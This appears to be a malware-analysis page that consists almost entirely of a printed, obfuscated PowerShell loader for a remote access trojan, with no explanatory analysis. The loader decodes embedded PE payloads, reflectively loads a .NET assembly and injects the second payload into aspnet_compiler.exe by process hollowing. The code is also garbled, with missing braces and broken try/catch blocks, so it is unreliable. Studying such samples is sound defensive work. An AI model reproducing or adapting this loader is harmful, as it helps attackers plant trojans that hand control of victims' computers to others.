Static Analysis

#mY cODER 3LOSH RAT ::::::

Function HzGaJsAt([String] $JJES367) {

$HHHHWQW4 = [System.Collections.Generic.List[Byte]]::new()

for ($i = 0; $i -lt $JJES367.Length; $i +=8) {

$HHHHWQW4.Add([Convert]::ToByte($JJES367.Substring($i, 8), 2))

return [System.Text.Encoding]::ASCII.GetString($HHHHWQW4.ToArray())

function ALOSHDOX32FESGSEGYBTVSRASWARBVAAARVWWV {

param($Alosh)

$Alosh = $Alosh -split '(..)' | ? { $_ }

ForEach ($JSEYHESSS325 in $Alosh){

[Convert]::ToInt32($JSEYHESSS325,16)

$aloooooooo = '4D5@9%%%%3%%%%%%%4%%%%%%FFFF%%%%B8%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%8%%%%%%%%E!FB@%E%%B4%9CD2!B8%!4CCD2!546869732%7%726F67726!6D2%636!6E6E6F742%62652%72756E2%696E2%444F532%6D6F64652E%D%D%@24%%%%%%%%%%%%%%5%45%%%%4C%!%3%%8@25%B65%%%%%%%%%%%%%%%%E%%%%2%!%B%!%8%%%%F6%%%%%%%@%%%%%%%%%%%%DE!5%!%%%%2%%%%%%%2%%!%%%%%%4%%%%%2%%%%%%%%2%%%%%4%%%%%%%%%%%%%%%4%%%%%%%%%%%%%%%%6%%!%%%%%2%%%%%%%%%%%%%2%%6%85%%%%!%%%%%!%%%%%%%%%!%%%%%!%%%%%%%%%%%%%!%%%%%%%%%%%%%%%%%%%%%%%9%!5%!%%4B%%%%%%%%2%%!%%FF%7%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%!%%%C%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%%8%%%%%%%%%%%%%%%%%%%%%%%82%%%%%48%%%%%%%%%%%%%%%%%%%%%%2E74657874%%%%%%E4F5%%%%%%2%%%%%%%F6%%%%%%%2%%%%%%%%%%%%%%%%%%%%%%%%%%%%2%%%%%6%2E72737263%%%%%%FF%7%%%%%%2%%!%%%%%8%%%%%%F8%%%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%4%2E72656C6F63%%%%%C%%%%%%%%4%%!%%%%%2%%%%%%%%%!%%%%%%%%%%%%%%%%%%%%%%%%%%4%%%%%42%%%%%%%%%%%%%%%%%

$geGWHZ = '4D5@9OOOO3OOOOOOO4OOOOOOFFFFOOOOB8OOOOOOOOOOOOOO4OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO8OOOOOOOOE!FB@OEOOB4O9CD2!B8O!4CCD2!546869732O7O726F67726!6D2O636!6E6E6F742O62652O72756E2O696E2O444F532O6D6F64652EODODO@24OOOOOOOOOOOOOO5O45OOOO4CO!O3OO@9F734EOOOOOOOOOOOOOOOOOEOOO222OOBO!3OOOOO@2OOOOOOO6OOOOOOOOOOOO2EC!OOOOOO2OOOOOOOEOOOOOOOOOOO!OOO2OOOOOOOO2OOOOO4OOOOOOOOOOOOOOO6OOOOOOOOOOOOOOOO2OO!OOOOO2OOOOOOOOOOOOO3OO6O85OOOO!OOOOO!OOOOOOOOO!OOOOO!OOOOOOOOOOOOO!OOOOOOOOOOOOOOOOOOOOOOODCCOOOOO4FOOOOOOOOEOOOOOBEO3OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO!OOOCOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO2OOOOOO8OOOOOOOOOOOOOOOOOOOOOOO82OOOOO48OOOOOOOOOOOOOOOOOOOOOO2E74657874OOOOOO34@!OOOOOO2OOOOOOO@2OOOOOOO2OOOOOOOOOOOOOOOOOOOOOOOOOOOO2OOOOO6O2E72737263OOOOOOBEO3OOOOOOEOOOOOOOO4OOOOOO@4OOOOOOOOOOOOOOOOOOOOOOOOOOOO4OOOOO4O2E72656C6F63OOOOOCOOOOOOOOOOO!OOOOO2OOOOOO@8OOOOOOOOOOOOOOOOOOOOOOOOOOOO4OOOOO42OOOOOOOOOOOOOOOOOOOOO

[byte[]]$UUSW23 = ALOSHDOX32FESGSEGYBTVSRASWARBVAAARVWWV $aloooooooo

[byte[]]$JESTW3ERH2 = ALOSHDOX32FESGSEGYBTVSRASWARBVAAARVWWV $geGWHZ

$SJEWS4 = (HzGaJsAt("*1***1*1*1111****11**1*1*11***11*111*1*1*111*1***11**1*1".Replace('*','0')))

$JDRU32 = (HzGaJsAt("0*00*00*0**0***00***0**00**0****0**0*0**0**00*0*".Replace('*','1')))

$JSEEESWR = 'C:\Wi**nd**ows\Mi**cro**soft.NET\Frame**work\v4.0.30319\asp**net_com**pi**ler.**e**x**e'

$JRES3E5 = [System.Reflection.Assembly]

$ncrx3 = $JRES3E5::Load(($JESTW3ERH2))

} catch { }

try

$EUS3W3 = $ncrx3.GetType('N' +'e' +'wP' +'E.PE');

$EUZW = $EUS3W3.'GetMethod'($SJEWS4);

} catch { }

try

$HYYAW42 = $JSEEESWR.Replace("**", "")

$SEYEYHHSSSSSSW = [object[]]($HYYAW42, $UUSW23)

$EUZW.$JDRU32.Invoke($null, $SEYEYHHSSSSSSW)

} catch { }

} catch { }